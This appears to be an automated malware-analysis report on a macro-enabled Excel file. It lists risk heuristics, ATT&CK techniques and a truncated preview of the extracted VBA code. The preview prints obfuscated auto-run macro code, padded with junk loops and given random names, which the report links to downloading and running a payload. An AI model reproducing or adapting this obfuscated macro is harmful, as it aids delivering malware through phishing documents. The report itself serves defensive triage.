MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical heuristic firing for a Shell() call within a Workbook_Open macro indicates that the VBA code is designed to execute external commands. The presence of obfuscated VBA code and the 'CreateObject' call further suggest that the macro is attempting to download and run a secondary payload. Given these indicators, the most likely attack pattern is a macro-enabled document used for initial access via spearphishing.
Heuristics 6
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15816 bytes |
SHA-256: 4f24d654f572fbb8965b66e3ca338d6405809cafe5157a51dec54901f858d58b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
LuzU2qsyZSog.TixfRPoPwjeqNFjdIAsy
While 8 = 9813
Dim dKDMoF24m6UqiUWOlwVPWw_E9xGSrDnb3byH As Variant
Wend
Dim dizJXtmzMwG2r As Integer
While 16 = 7747
Dim T2VnbaqK8Mz9hJiQ3wEeNtB6J1mHH2JoOkWJQwYAG7fU9Kz As Variant
Wend
Dim hDhT_BUcizYbj As Integer
While 26 = 8870
Dim wgB_CJr6wW9_VDWQLp69AD_jgJm3GxT1 As Variant
Wend
Dim TxMj5aQxb3uohNl As Integer
While 19 = 433
Dim JUIcbiraZg2fyx9BFtgzvUuWFfGRXBRgo56aJW1NdG As Variant
Wend
Dim c3YQmDumZc_F As Integer
While 5 = 4680
Dim JyiuU6ZYBXNSz32f1s3QUm127y3DgujxbhsF1XB4x_E_mEZsJMuq As Variant
Wend
Dim ivuf7qxeCV1OwYz As Integer
While 28 = 8403
Dim QIuoap9cOgvM1XI2R_3NpwKIIje1ZLyQMNGhYhR_jQd8Ib6F3dhO As Variant
Wend
Dim JId7kd1JFBCr As Integer
While 19 = 2926
Dim c_kOjatp2mWQL9pmW86niWB_mkwCayb As Variant
Wend
Dim OaOpbS1RBwhAf As Integer
While 21 = 2536
Dim uKslwLvH_WGE7fl8mpMCJGz7QMRfo4z_V As Variant
Wend
Dim eRZ1JNNBRIC As Integer
While 11 = 6920
Dim FjewMSWFT7UmUvSi3NcIgGraMJFbZ9A17vyqreQUfsnXHoD_1oTvy_e9 As Variant
Wend
Dim ChCK4oT6coi7k1 As Integer
While 4 = 535
Dim W7GlwbRQhFAkunMB7Oyzn7NHlCSbo9dGNw7ypVqeg As Variant
Wend
Dim u_5JR3pqar As Integer
While 13 = 5207
Dim RFuLZq9_sHzlil3V8qXTjhSQ26S8RIluLPJAbieGqU7VqGZRP658 As Variant
Wend
Dim QEFtvcScWApie As Integer
While 4 = 4556
Dim DXQZ23WJPmMj7jse_pVMmbEHZM8OBs As Variant
Wend
Dim onWzlsG2WBfw_ As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "LuzU2qsyZSog"
Dim jQU69aoE7LjNAiDwWrXQ68v2AAyoGUFCkIeMdvAFYW2HAn3d9hp4Ilalec47k_8jEglzDyQkpP1h_ As String
Function b3Hy3i7VSST1jRG_n4GHf7hLE7_WGQSpzbmOPW_o_VUTB9AZ9(f58sj8iJgBw_25_W_QOSXKReALZ4DYKWc4KcY_vIDDUl9MhXqq33gDbTlbrVgnFGyXf8rj75dENSypewmBKVeRyXZ116VXkX7LvjqjoFs7WZxHd575sdatkfhFf1rAhEdyUl35_CV_lh5X)
While 28 = 1548
Dim UpMs6YzhSM9ndmyTQhwv_RUCv6Efk1iMxtxi9o__eHFn3Tib_RL1 As Variant
Wend
Dim gf9CTJ7_SS7b As Integer
While 3 = 868
Dim nuzsxNUlhvPzKpHZVmaRnroPtuNwq_pKKm_Gdymy6jQuOHzmA As Variant
Wend
Dim elo2mx5Eh9C9g As Integer
While 13 = 1112
Dim g_DngoA6f9kUDY4Ak4jvJVARgyDB5zjyW As Variant
Wend
Dim otoJcR8_iEo As Integer
Dim d_yLFNlTK8rqNMB7EUZGeOwc4YW_bPV6maF69wcpQQ3P1AFWtr9ADMZMQTRpzl25kuDwFE7Q1tzMUfl2Q_NsPT1X_2nmdvzoX8n_7ROntqHSVL1urYXyVGmO3nwNaSv_4JxW
While 6 = 2765
Dim PPteKgVGXurIDuErk9_pXu8WoMyGklukPTBO_hyWba As Variant
Wend
Dim Zl7ijYViUAhXPdR As Integer
While 19 = 7341
Dim Uy7qNfv_F3srzmBHlM6TTZEmYtAOsB As Variant
Wend
Dim Cg6rr2pL4nlzozq As Integer
While 3 = 8409
Dim f6S26JSI75sSQdeeODAoI34SO5_BorjYvqMD61_psV9 As Variant
Wend
Dim v8hXrXGUunIf As Integer
Dim cJTFo9tZAa2aLS2YEzG313NYcisJqny_uF6VCHUCDmv_wHVtb_XkBxAj54lEOirVkwpEWeV7
While 9 = 1289
Dim lA_k_IQcMTSfiOZiX8S6w4FTqfPlgVxtk As Variant
Wend
Dim JjC5N_eZ3tan As Integer
While 12 = 6821
Dim Axb7h7vSMsr3o4b3n61eh5WnWmH3wd3 As Variant
Wend
Dim Iooorxn9XAYWa2H As Integer
While 11 = 9127
Dim OSklv626_EZwi4w3frygM9NtD_7
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.